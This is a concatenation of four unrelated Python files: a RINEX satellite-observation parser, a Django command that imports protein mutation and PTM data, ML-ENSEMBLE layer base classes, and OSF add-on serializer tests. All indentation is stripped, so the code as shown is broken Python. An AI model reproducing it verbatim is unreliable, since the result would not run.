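# Format note (added for clarity): np.genfromtxt is called with delimiter=(14,1,1)*5
# because each RINEX 2 observation field is 14 characters of value followed by a
# one-character loss-of-lock indicator (lli) and a one-character signal strength
# indicator (ssi), with at most five observations per 80-character line. The
# returned array is therefore stacked as (data, lli, ssi) per observation type.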
def processBlocks(lines,header,obstimes,svset,headlines,sats):
"""
turns the rinex file and the info from scan() into a Panel4D
inputs:
the info from scan(), see scan() above
outputs:
blocks - the Panel4D with all the data, see above for organization
"""
obstypes = header['# / TYPES OF OBSERV'][1:]
blocks = np.nan*np.ones((len(obstypes),max(svset)+1,len(obstimes),3))
for i in range(len(headlines)):
linesinblock = len(sats[i])*int(np.ceil(header['# / TYPES OF OBSERV'][0]/5))
block = ''.join(lines[headlines[i]+1+int(len(sats[i])/13):headlines[i]+linesinblock+1+int(len(sats[i])/13)])
bdf = _block2df(block,obstypes,sats[i],len(sats[i]))
blocks[:,np.asarray(sats[i],int),i,:] = bdf
#print (blocks)
"""
it is way faster to turn a big numpy array into a Panel4D than
to make the Panel4D first and assign it one cell at a time,
Panel4Ds are slow, it is best to use numpy when possible
"""
blocks = Panel4D(blocks,
labels=obstypes,
items=np.arange(max(svset)+1),
major_axis=obstimes,
minor_axis=['data','lli','ssi'])
blocks = blocks[:,list(svset),:,:]
return blocks
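# End-to-end usage sketch (added; the file names and the 'C1' observation type are
# hypothetical and depend on the RINEX header):
#
#   writeRinexObs2Hdf('station0010.15o')              # parse once, cache as .h5
#   header, data, svs, times = readRinexObsHdf('station0010.h5')
#   pseudorange = data['C1', svs[0], :, 'data']       # one satellite, all epochs
#
# The Panel4D returned here is indexed as
# [observation type, satellite number, epoch, {'data', 'lli', 'ssi'}].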
|
|
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.db import connection
from django.db import IntegrityError
from protein.models import (Protein, ProteinGProtein,ProteinGProteinPair, ProteinConformation, ProteinState, ProteinFamily, ProteinAlias,
ProteinSequenceType, Species, Gene, ProteinSource, ProteinSegment)
from residue.models import (ResidueNumberingScheme, ResidueGenericNumber, Residue, ResidueGenericNumberEquivalent)
from mutational_landscape.models import NaturalMutations, CancerMutations, DiseaseMutations, PTMs
import pandas as pd
import numpy as np
import math, os
import logging
import re
from decimal import *
getcontext().prec = 20
class Command(BaseCommand):
help = 'Build Mutational Landscape'
# source file directory
mutation_data_path = os.sep.join([settings.DATA_DIR, 'mutational_landscape'])
logger = logging.getLogger(__name__)
def add_arguments(self, parser):
parser.add_argument('--filename', action='append', dest='filename',
help='Filename to import. Can be used multiple times')
def handle(self, *args, **options):
if options['filename']:
filenames = options['filename']
else:
filenames = False
try:
self.purge_data()
self.create_PTMs()
self.create_natural_mutations()
# self.create_cancer_mutations()
# self.create_disease_mutations()
except Exception as msg:
print(msg)
self.logger.error(msg)
def purge_data(self):
try:
PTMs.objects.all().delete()
NaturalMutations.objects.all().delete()
# CancerMutations.objects.all().delete()
# DiseaseMutations.objects.all().delete()
except Exception as msg:
print(msg)
self.logger.warning('Existing data cannot be deleted')
def create_natural_mutations(self, filenames=False):
self.logger.info('CREATING NATURAL MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('exac.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
snp_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(snp_data.iterrows()):
entry_name = snp_data[index:index+1]['EntryName'].values[0]
sequence_number = snp_data[index:index+1]['SequenceNumber'].values[0]
allele_frequency = float(snp_data[index:index+1]['Allele Frequency'].values[0])
allele_count = int(snp_data[index:index+1]['Allele Count'].values[0])
allele_number = int(snp_data[index:index+1]['Allele Number'].values[0])
number_homozygotes = int(snp_data[index:index+1]['Number of Homozygotes'].values[0])
type = snp_data[index:index+1]['type'].values[0]
if 'lof' in filename:
prot_con = snp_data[index:index+1]['Protein Consequence'].values[0]
splitterm = re.findall(r'\d+', prot_con)[0]
amino_acid = prot_con.split(splitterm)[1]
sift_score = None
polyphen_score = None
else:
amino_acid = snp_data[index:index+1]['NMaa'].values[0]
sift_score = float(snp_data[index:index+1]['sift_score'].values[0])
polyphen_score = float(snp_data[index:index+1]['polyphen_score'].values[0])
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
# self.logger.warning('No residue number (GAP - position) for', sequence_number, "in ", p.name, "")
continue
if res:
# try:
snp, created = NaturalMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid, allele_frequency=allele_frequency, allele_count=allele_count, allele_number=allele_number, number_homozygotes=number_homozygotes,
sift_score=sift_score, type=type, polyphen_score=polyphen_score) #
# if created:
# self.logger.info('Created SNP for ' + str(sequence_number) + ' for protein ' + str(p.name))
# except:
# print(entry_name, sequence_number, allele_frequency, allele_count, allele_number, number_homozygotes, type)
# self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING NATURAL MUTATIONS')
def create_cancer_mutations(self, filenames=False):
self.logger.info('CREATING CANCER MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('cancer.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
cancer_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(cancer_data.iterrows()):
entry_name = cancer_data[index:index+1]['EntryName'].values[0]
sequence_number = cancer_data[index:index+1]['site'].values[0]
amino_acid = cancer_data[index:index+1]['variant'].values[0]
# allele_frequency = float(cancer_data[index:index+1]['allelefreq'].values[0])
# allele_count = int(cancer_data[index:index+1]['allelecount'].values[0])
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
print('No residue number for', str(sequence_number), "in ", p.name)
# self.logger.warning('No residue number for', res, "in ", p.name)
continue
if res:
# try:
cancer, created = CancerMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid, cancer_type='unknown')
if created:
self.logger.info('Created SNP for '+ str(sequence_number) + ' for protein ' + str(p.name))
# except:
# # self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING CANCER MUTATIONS')
def create_disease_mutations(self, filenames=False):
self.logger.info('CREATING DISEASE MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('disease.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
disease_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(disease_data.iterrows()):
entry_name = disease_data[index:index+1]['EntryName'].values[0]
sequence_number = disease_data[index:index+1]['site'].values[0]
amino_acid = disease_data[index:index+1]['variant'].values[0]
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
print('No residue number for', str(sequence_number), "in ", p.name)
# self.logger.warning('No residue number for', res, "in ", p.name)
continue
if res:
# try:
disease, created = DiseaseMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid)
if created:
self.logger.info('Created SNP for ' + str(sequence_number) + ' for protein ' + str(p.name))
# except:
# print('No Cancer mutation created for', sequence_number, "in ", p.name)
# continue
# self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING DISEASE MUTATIONS')
def create_PTMs(self, filenames=False):
self.logger.info('CREATING PTM SITES')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('ptms.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
ptm_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(ptm_data.iterrows()):
entry_name = ptm_data[index:index+1]['EntryName'].values[0]
sequence_number = ptm_data[index:index+1]['SequenceNumber'].values[0]
modification = ptm_data[index:index+1]['Type'].values[0]
# source = ptm_data[index:index+1]['Source'].values[0]
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
continue
if res:
# g = PTMsType.objects.get_or_create(modification=modification)
snp, created = PTMs.objects.get_or_create(protein=p, residue=res, modification=modification) #
self.logger.info('COMPLETED CREATING PTM SITES')
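# Usage sketch (added; the command name is derived from this module's file name
# and is therefore hypothetical here):
#
#   python manage.py build_mutational_landscape
#   python manage.py build_mutational_landscape --filename gpcr_exac.csv
#
# The handler purges existing PTMs/NaturalMutations records and rebuilds them from
# the CSV files found under settings.DATA_DIR/mutational_landscape.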
|
|
"""ML-ENSEMBLE
:author: Sebastian Flennerhag
:copyright: 2017-2018
:licence: MIT
Base classes for ensemble layer management.
"""
# pylint: disable=protected-access
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
from __future__ import division, print_function, with_statement
from abc import ABCMeta, abstractmethod
import warnings
from .. import config
from ..parallel import Layer, ParallelProcessing, make_group
from ..parallel.base import BaseStacker
from ..externals.sklearn.validation import check_random_state
from ..utils import (check_ensemble_build, print_time,
safe_print, IdTrain, format_name)
from ..utils.exceptions import (
LayerSpecificationWarning, NotFittedError, NotInitializedError)
from ..metrics import Data
from ..externals.sklearn.base import BaseEstimator, clone
try:
# Try get performance counter
from time import perf_counter as time
except ImportError:
# Fall back on wall clock
from time import time
GLOBAL_SEQUENTIAL_NAME = list()
def check_kwargs(kwargs, forbidden):
"""Pop unwanted arguments and issue warning"""
for f in forbidden:
s = kwargs.pop(f, None)
if s is not None:
warnings.warn(
"Layer-specific parameter '%s' contradicts"
"ensemble-wide settings. Ignoring." % f,
LayerSpecificationWarning)
def print_job(lc, start_message):
"""Print job details.
Parameters
----------
lc : :class:`Sequential`
The LayerContainer instance running the job.
start_message : str
Initial message.
"""
f = "stdout" if lc.verbose < 10 else "stderr"
if lc.verbose:
safe_print("\n%s %d layers" % (start_message, len(lc.stack)),
file=f, flush=True)
if lc.verbose >= 5:
safe_print("""[INFO] n_jobs = %i
[INFO] backend = %r
[INFO] start_method = %r
[INFO] cache = %r
""" % (lc.n_jobs, lc.backend, config.get_start_method(), config.get_tmpdir()),
file=f, flush=True)
t0 = time()
return f, t0
###############################################################################
class Sequential(BaseStacker):
r"""Container class for a stack of sequentially processed estimators.
The Sequential class stores all layers as an ordered dictionary
and possesses a ``get_params`` method to appear as an estimator
in the Scikit-learn API. This allows correct cloning and parameter
updating.
Parameters
----------
stack: list, optional (default = None)
list of estimators (i.e. layers) to build instance with.
n_jobs : int (default = -1)
Degree of concurrency. Set ``n_jobs = -1`` for maximal parallelism and
``n_jobs=1`` for sequential processing.
backend : str, (default="threading")
the joblib backend to use (i.e. "multiprocessing" or "threading").
raise_on_exception : bool (default = False)
raise error on soft exceptions. Otherwise issue warning.
verbose : int or bool (default = False)
level of verbosity.
- ``verbose = 0`` silent (same as ``verbose = False``)
- ``verbose = 1`` messages at start and finish
(same as ``verbose = True``)
- ``verbose = 2`` messages for each layer
- etc
If ``verbose >= 10`` prints to ``sys.stderr``, else ``sys.stdout``.
"""
def __init__(self, name=None, verbose=False, stack=None, **kwargs):
if stack and not isinstance(stack, list):
if stack.__class__.__name__.lower() == 'layer':
stack = [stack]
else:
raise ValueError(
"Expect stack to be a Layer or a list of Layers. "
"Got %r" % stack)
name = format_name(name, 'sequential', GLOBAL_SEQUENTIAL_NAME)
super(Sequential, self).__init__(
stack=stack, name=name, verbose=verbose, **kwargs)
def __iter__(self):
"""Generator for stacked layers"""
for layer in self.stack:
yield layer
def fit(self, X, y=None, **kwargs):
r"""Fit instance.
Iteratively fits each layer in the stack on the output of
the preceding layer. The first layer is fitted on the input data.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
"""
if not self.__stack__:
raise NotInitializedError("No elements in stack to fit.")
f, t0 = print_job(self, "Fitting")
with ParallelProcessing(self.backend, self.n_jobs,
max(self.verbose - 4, 0)) as manager:
out = manager.stack(self, 'fit', X, y, **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Fit complete"), file=f)
if out is None:
return self
return out
def fit_transform(self, X, y=None, **kwargs):
r"""Fit instance and return cross-validated predictions.
Equivalent to ``Sequential().fit(X, y, return_preds=True)``
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
"""
return self.fit(X, y, return_preds=True, **kwargs)
def predict(self, X, **kwargs):
r"""Predict.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
**kwargs : optional
optional keyword arguments.
Returns
-------
X_pred : array-like of shape = [n_samples, n_fitted_estimators]
predictions from final layer.
"""
if not self.__fitted__:
NotFittedError("Instance not fitted.")
f, t0 = print_job(self, "Predicting")
out = self._predict(X, 'predict', **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Predict complete"),
file=f, flush=True)
return out
def transform(self, X, **kwargs):
"""Predict using sub-learners as is done during the ``fit`` call.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
*args : optional
optional arguments.
**kwargs : optional
optional keyword arguments.
Returns
-------
X_pred : array-like of shape = [n_test_samples, n_fitted_estimators]
predictions from ``fit`` call to final layer.
"""
if not self.__fitted__:
NotFittedError("Instance not fitted.")
f, t0 = print_job(self, "Transforming")
out = self._predict(X, 'transform', **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Transform complete"),
file=f, flush=True)
return out
def _predict(self, X, job, **kwargs):
r"""Generic for processing a predict job through all layers.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
job : str
type of prediction. Should be 'predict' or 'transform'.
Returns
-------
X_pred : array-like
predictions from final layer. Either predictions from ``fit`` call
or new predictions on X using base learners fitted on all training
data.
"""
r = kwargs.pop('return_preds', True)
with ParallelProcessing(self.backend, self.n_jobs,
max(self.verbose - 4, 0)) as manager:
out = manager.stack(self, job, X, return_preds=r, **kwargs)
if not isinstance(out, list):
out = [out]
out = [p.squeeze() for p in out]
if len(out) == 1:
out = out[0]
return out
@property
def data(self):
"""Ensemble data"""
out = list()
for layer in self.stack:
d = layer.raw_data
if not d:
continue
out.extend([('%s/%s' % (layer.name, k), v) for k, v in d])
return Data(out)
###############################################################################
class BaseEnsemble(BaseEstimator):
"""BaseEnsemble class.
Core ensemble class methods used to add ensemble layers and manipulate
parameters.
Parameters
----------
model_selection: bool (default=False)
Whether to use the ensemble in model selection mode. If ``True``,
this will alter the ``transform`` method. When calling ``transform``
on new data, the ensemble will call ``predict``, while calling
``transform`` with the training data reproduces predictions from the
``fit`` call. Hence the ensemble can be used as a pure transformer
in a preprocessing pipeline passed to the :class:`Evaluator`, as
training folds are faithfully reproduced as during a ``fit`` call and
test folds are transformed with the ``predict`` method.
sample_size: int (default=20)
size of training set sample
(``[min(sample_size, X.size[0]), min(X.size[1], sample_size)]``
shuffle: bool (default=False)
whether to shuffle input data during fit calls
random_state: bool (default=False)
random seed.
scorer: obj, optional
scorer function
verbose: bool, optional
verbosity
"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(
self, shuffle=False, random_state=None, scorer=None, verbose=False,
layers=None, array_check=None, model_selection=False, sample_size=20,
**kwargs):
self.shuffle = shuffle
self.random_state = random_state
self.scorer = scorer
self._model_selection = model_selection
self._verbose = verbose
self.layers = layers if layers else list()
self.sample_size = sample_size
self.model_selection = model_selection
self._backend = Sequential(verbose=verbose, **kwargs)
self.raise_on_exception = self._backend.raise_on_exception
if layers:
layers_ = clone(layers)
self._backend.push(*layers_)
if array_check is not None:
warnings.warn(
"array checking is deprecated. The array_check argument will be removed in 0.2.4.",
DeprecationWarning)
def add(self, estimators, indexer, preprocessing=None, **kwargs):
"""Method for adding a layer.
Parameters
-----------
estimators: dict of lists or list of estimators, or :class:`Layer`.
Pre-made layer or estimators to construct layer with.
If ``preprocessing`` is ``None`` or ``list``, ``estimators`` should
be a ``list``. The list can either contain estimator instances,
named tuples of estimator instances, or a combination of both. ::
option_1 = [estimator_1, estimator_2]
option_2 = [("est-1", estimator_1), ("est-2", estimator_2)]
option_3 = [estimator_1, ("est-2", estimator_2)]
If different preprocessing pipelines are desired, a dictionary
that maps estimators to preprocessing pipelines must be passed.
The names of the estimator dictionary must correspond to the
names of the preprocessing dictionary. ::
preprocessing_cases = {"case-1": [trans_1, trans_2],
"case-2": [alt_trans_1, alt_trans_2]}
estimators = {"case-1": [est_a, est_b],
"case-2": [est_c, est_d]}
The lists for each dictionary entry can be any of ``option_1``,
``option_2`` and ``option_3``.
indexer : instance or None (default = None)
Indexer instance to use. Defaults to the layer class
indexer with default settings. See :mod:`mlens.base` for details.
preprocessing: dict of lists or list, optional (default = None)
preprocessing pipelines for given layer. If
the same preprocessing applies to all estimators, ``preprocessing``
should be a list of transformer instances. The list can contain the
instances directly, named tuples of transformers,
or a combination of both. ::
option_1 = [transformer_1, transformer_2]
option_2 = [("trans-1", transformer_1),
("trans-2", transformer_2)]
option_3 = [transformer_1, ("trans-2", transformer_2)]
If different preprocessing pipelines are desired, a dictionary
that maps preprocessing pipelines must be passed. The names of the
preprocessing dictionary must correspond to the names of the
estimator dictionary. ::
preprocessing_cases = {"case-1": [trans_1, trans_2],
"case-2": [alt_trans_1, alt_trans_2]}
estimators = {"case-1": [est_a, est_b],
"case-2": [est_c, est_d]}
The lists for each dictionary entry can be any of ``option_1``,
``option_2`` and ``option_3``.
**kwargs : optional
keyword arguments to be passed onto the layer at instantiation.
Returns
----------
self : instance
Modified instance.
"""
lyr = self._build_layer(estimators, indexer, preprocessing, **kwargs)
self.layers.append(clone(lyr))
setattr(self, lyr.name.replace('-', '_'), lyr)
self._backend.push(lyr)
return self
def replace(self, idx, estimators, indexer, preprocessing=None, **kwargs):
"""Replace a layer.
Replace a layer in the stack with a new layer.
See :func:`add` for full parameter documentation.
Parameters
-----------
idx: int
Position in stack of layer to replace. Indexing is 0-based.
estimators: dict of lists or list of estimators, or :class:`Layer`.
Pre-made layer or estimators to construct layer with.
indexer : instance or None (default = None)
Indexer instance to use. Defaults to the layer class
indexer with default settings. See :mod:`mlens.base` for details.
preprocessing: dict of lists or list, optional (default = None)
preprocessing pipelines for given layer.
**kwargs : optional
keyword arguments to be passed onto the layer at instantiation.
Returns
----------
self : instance
Modified instance
"""
lyr = self._build_layer(estimators, indexer, preprocessing, **kwargs)
self.layers[idx] = clone(lyr)
setattr(self, lyr.name.replace('-', '_'), lyr)
self._backend.replace(idx, lyr)
return self
def remove(self, idx):
"""Remove a layer from stack
Remove a layer at a given position from stack.
Parameters
----------
idx: int
Position in stack. Indexing is 0-based.
Returns
-------
self: instance
Modified instance
"""
name = self.layers[idx].name
self.layers.pop(idx)
delattr(self, name.replace('-', '_'))
self._backend.pop(idx)
return self
def fit(self, X, y=None, **kwargs):
"""Fit ensemble.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
y : array-like of shape = [n_samples, ] or None (default = None)
output vector to train estimators on.
Returns
-------
self : instance
class instance with fitted estimators.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return self
if self.model_selection:
self._id_train.fit(X)
out = self._backend.fit(X, y, **kwargs)
if out is not self._backend:
# fit_transform
return out
else:
return self
def transform(self, X, y=None, **kwargs):
"""Transform with fitted ensemble.
Replicates cross-validated prediction process from training.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
y : array-like, shape[n_samples, ]
targets. Needs to be passed as input in model selection mode as
some indexers will reduce the size of the input array (X) and
y must be adjusted accordingly.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array. If in model selection mode,
return a tuple ``(X_trans, y_trans)`` where ``y_trans`` is either
``y``, or a truncated version to match the samples in ``X_trans``.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return
if self.model_selection:
if y is None:
raise TypeError(
"In model selection mode, y is a required argument.")
# Need to modify the transform method to account for blending
# cutting X in size, so y needs to be cut too
if not self._id_train.is_train(X):
return self.predict(X, **kwargs), y
# Asked to reproduce predictions during fit, here we need to
# account for that in model selection mode,
# blend ensemble will cut X in observation size so need to adjust y
X = self._backend.transform(X, **kwargs)
if X.shape[0] != y.shape[0]:
r = y.shape[0] - X.shape[0]
y = y[r:]
return X, y
return self._backend.transform(X, **kwargs)
def fit_transform(self, X, y, **kwargs):
r"""Fit ensemble and return cross-validated predictions.
Equivalent to ``ensemble.fit(X, y).transform(X)``, but more efficient.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array. If in model selection mode,
return a tuple ``(X_trans, y_trans)`` where ``y_trans`` is either
``y``, or a truncated version to match the samples in ``X_trans``.
"""
kwargs.pop('return_preds', None)
return self.fit(X, y, return_preds=True, **kwargs)
def predict(self, X, **kwargs):
"""Predict with fitted ensemble.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return
return self._backend.predict(X, **kwargs)
def predict_proba(self, X, **kwargs):
"""Predict class probabilities with fitted ensemble.
Compatibility method for Scikit-learn. This method checks that the
final layer has ``proba=True``, then calls the regular ``predict``
method.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array.
"""
kwargs.pop('proba', None)
return self.predict(X, proba=True, **kwargs)
def _build_layer(self, estimators, indexer, preprocessing, **kwargs):
"""Build a layer from estimators and preprocessing pipelines"""
# --- check args ---
# Arguments that cannot vary between layers
check_kwargs(kwargs, ['backend', 'n_jobs'])
# Pop layer kwargs and override Sequential args
verbose = kwargs.pop('verbose', max(self._backend.verbose - 1, 0))
dtype = kwargs.pop('dtype', self._backend.dtype)
propagate = kwargs.pop('propagate_features', None)
shuffle = kwargs.pop('shuffle', self.shuffle)
random_state = kwargs.pop('random_state', self.random_state)
rs = kwargs.pop('raise_on_exception', self.raise_on_exception)
if random_state:
random_state = check_random_state(random_state).randint(0, 10000)
# Set learner kwargs
kwargs['verbose'] = max(verbose - 1, 0)
kwargs['scorer'] = kwargs.pop('scorer', self.scorer)
# Check estimator and preprocessing formatting
group = make_group(indexer, estimators, preprocessing, kwargs)
# --- layer ---
name = "layer-%i" % (len(self._backend.stack) + 1) # Start count at 1
lyr = Layer(
name=name, dtype=dtype, shuffle=shuffle,
random_state=random_state, verbose=verbose,
raise_on_exception=rs, propagate_features=propagate)
lyr.push(group)
return lyr
@property
def model_selection(self):
"""Turn model selection mode"""
return self._model_selection
@model_selection.setter
def model_selection(self, model_selection):
"""Turn model selection on or off"""
self._model_selection = model_selection
if self._model_selection:
self._id_train = IdTrain(self.sample_size)
else:
self._id_train = None
@property
def data(self):
"""Fit data"""
return self._backend.data
@property
def verbose(self):
"""Level of printed messages"""
return self._verbose
@verbose.setter
def verbose(self, value):
"""Set level of printed messages"""
self._verbose = value
self._backend.verbose = value
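# Usage sketch (added for illustration): BaseEnsemble is abstract, so in practice a
# concrete subclass (e.g. mlens.ensemble.SuperLearner) is used; the estimators below
# are placeholders and X_train/y_train are assumed to be numpy arrays.
#
#   from sklearn.linear_model import LogisticRegression
#   from sklearn.ensemble import RandomForestClassifier
#
#   ensemble = SuperLearner(verbose=2)
#   ensemble.add([RandomForestClassifier(), LogisticRegression()])  # base layer
#   ensemble.add_meta(LogisticRegression())                         # meta learner
#   ensemble.fit(X_train, y_train)
#   predictions = ensemble.predict(X_test)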
|
|
#!/usr/bin/env python
# encoding: utf-8
import os
from types import NoneType
from xmlrpclib import DateTime
import mock
from nose.tools import *
from webtest_plus import TestApp
from tests.base import OsfTestCase
from tests.factories import (UserFactory, ProjectFactory, NodeFactory,
AuthFactory, PointerFactory, DashboardFactory, FolderFactory, RegistrationFactory)
from framework.auth import Auth
from website.util import rubeus, api_url_for
import website.app
from website.util.rubeus import sort_by_name
from website.settings import ALL_MY_REGISTRATIONS_ID, ALL_MY_PROJECTS_ID, \
ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME, DISK_SAVING_MODE
class TestRubeus(OsfTestCase):
def setUp(self):
super(TestRubeus, self).setUp()
self.project = ProjectFactory.build()
self.consolidated_auth = Auth(user=self.project.creator)
self.non_authenticator = UserFactory()
self.project.save()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.add_addon('s3', self.consolidated_auth)
self.project.creator.add_addon('s3', self.consolidated_auth)
self.node_settings = self.project.get_addon('s3')
self.user_settings = self.project.creator.get_addon('s3')
self.user_settings.access_key = 'We-Will-Rock-You'
self.user_settings.secret_key = 'Idontknowanyqueensongs'
self.node_settings.bucket = 'Sheer-Heart-Attack'
self.node_settings.user_settings = self.user_settings
self.node_settings.save()
def test_hgrid_dummy(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
# FIXME: These tests are very brittle.
expected = {
'isPointer': False,
'provider': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'extra': None,
'buttons': None,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
expected['permissions'] = permissions
actual = rubeus.build_addon_root(node_settings, node_settings.bucket, permissions=permissions)
assert actual['urls']['fetch']
assert actual['urls']['upload']
del actual['urls']
assert_equals(actual, expected)
def test_build_addon_root_has_correct_upload_limits(self):
self.node_settings.config.max_file_size = 10
self.node_settings.config.high_max_file_size = 20
node = self.project
user = self.project.creator
auth = Auth(user)
permissions = {
'view': node.can_view(auth),
'edit': node.can_edit(auth) and not node.is_registration,
}
result = rubeus.build_addon_root(
self.node_settings,
self.node_settings.bucket,
permissions=permissions,
user=user
)
assert_equal(result['accept']['maxSize'], self.node_settings.config.max_file_size)
# user now has elevated upload limit
user.system_tags.append('high_upload_limit')
user.save()
result = rubeus.build_addon_root(
self.node_settings,
self.node_settings.bucket,
permissions=permissions,
user=user
)
assert_equal(
result['accept']['maxSize'],
self.node_settings.config.high_max_file_size
)
def test_hgrid_dummy_fail(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
rv = {
'isPointer': False,
'addon': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'permissions': {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
},
'urls': {
'fetch': node.api_url + 's3/hgrid/',
'upload': node.api_url + 's3/upload/'
},
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
assert_not_equals(rubeus.build_addon_root(
node_settings, node_settings.bucket, permissions=permissions), rv)
def test_hgrid_dummy_overrides(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
expected = {
'isPointer': False,
'provider': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'permissions': {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
},
'urls': {},
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'extra': None,
'buttons': None,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
assert_equal(
rubeus.build_addon_root(
node_settings, node_settings.bucket,
permissions=permissions, urls={}
),
expected
)
def test_serialize_private_node(self):
user = UserFactory()
auth = Auth(user=user)
public = ProjectFactory.build(is_public=True)
# Add contributor with write permissions to avoid admin permission cascade
public.add_contributor(user, permissions=['read', 'write'])
public.save()
private = ProjectFactory(parent=public, is_public=False)
NodeFactory(parent=private)
collector = rubeus.NodeFileCollector(node=public, auth=auth)
private_dummy = collector._serialize_node(private)
assert_false(private_dummy['permissions']['edit'])
assert_false(private_dummy['permissions']['view'])
assert_equal(private_dummy['name'], 'Private Component')
assert_equal(len(private_dummy['children']), 0)
def test_collect_components_deleted(self):
node = NodeFactory(creator=self.project.creator, parent=self.project)
node.is_deleted = True
collector = rubeus.NodeFileCollector(
self.project, Auth(user=UserFactory())
)
nodes = collector._collect_components(self.project, visited=[])
assert_equal(len(nodes), 0)
